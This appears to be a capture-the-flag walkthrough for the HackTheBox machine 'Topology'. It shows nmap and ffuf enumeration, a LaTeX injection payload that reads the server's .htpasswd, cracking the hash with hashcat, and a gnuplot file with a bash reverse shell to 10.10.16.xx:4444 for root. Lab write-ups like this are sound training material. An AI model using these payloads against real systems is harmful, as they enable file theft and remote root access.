I’ve started with simple machine enumeration

$ nmap -sV
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))

Then I went to topology.htb to check out the website, noticed the possible users (according to the email that is formatted like lklein@topology.htb). I’ve enumerated possible users:


I went on to figure out what is located at http://latex.topology.htb/equation.php which was the only link on the website. There I found out some LaTeX to PNG convertor. I’ve figured out that there must be some trickery with this so I went my way to research the topic.

I’ve found out the following:

These two links, helped me to figure out that I had an LFI vulnerability at hand. Upon searching different files such as /etc/passwd, /proc/self/cmdline, /proc/self/environ and so on, I’ve figured out that I must be missing something. I began to explore what other subdomains (because there is latex.topology.htb I thought there would be more) were on the webserver using ffuf.

$ ffuf -w $commontxt -u http://topology.htb/ -H "Host: FUZZ.topology.htb" -r

Which yielded the following domains:

  • dev
  • stats

I’ve browsed through those and on the stats there were simple plots about the current usage of the system and that’s it. But on the dev subdomain there was a Basic Auth in place which I then figured out that I can read the .htpasswd with the LFI vulnerability in the latex.topology.htb input form.

I’ve tried a couple of times to read the file, but there were unsuccessful, and I went my way to figure out why and what’s going on.

I honestly didn’t know how can I read the file and I turned out to some help, which I then understood that I can use the LaTeX/Source Code Listings which also can read a file with \lstinputlisting{/var/www/dev/.htpasswd}, however the website just resulted in no image (possible error) using just this command.

Here comes this post to the rescue https://tex.stackexchange.com/questions/410863/what-are-the-differences-between-and

Since the website is about math, we can use the inline math delimiters that are $ and $ which can turn my payload from \lstinputlisting{/var/www/dev/.htpasswd} to $\lstinputlisting{/var/www/dev/.htpasswd}$ which resulted into getting the basic auth hash.


Using hashcat we can extract the password

$ hashcat -m 1600 crack.txt /usr/share/wordlists/rockyou.txt

With that, I tried the users that I’ve enumerated earlier and the user vdaisley worked out, so I went to log in with SSH and got the user flag.


The root was pretty easy, first we can see which directories are writable:

$ find / -type d -writable 2>/dev/null

This directory looked suspicious, I’ve fired up pspy to checkout what is going on and I got this:


So we are finding *.plt files in this directory, and then we are executing gnuplot as root. Using this article, I’ve crafted a test.plt file with the contents of:

vdaisley@topology:/opt/gnuplot$ cat ~/test.plt 
system "bash -c 'bash -i >& /dev/tcp/10.10.16.xx/4444 0>&1'"

I’ve copied the file to the /opt/gnuplot directory and I’ve waited to get a remote connection which I got in about a minute. With that I rooted the machine.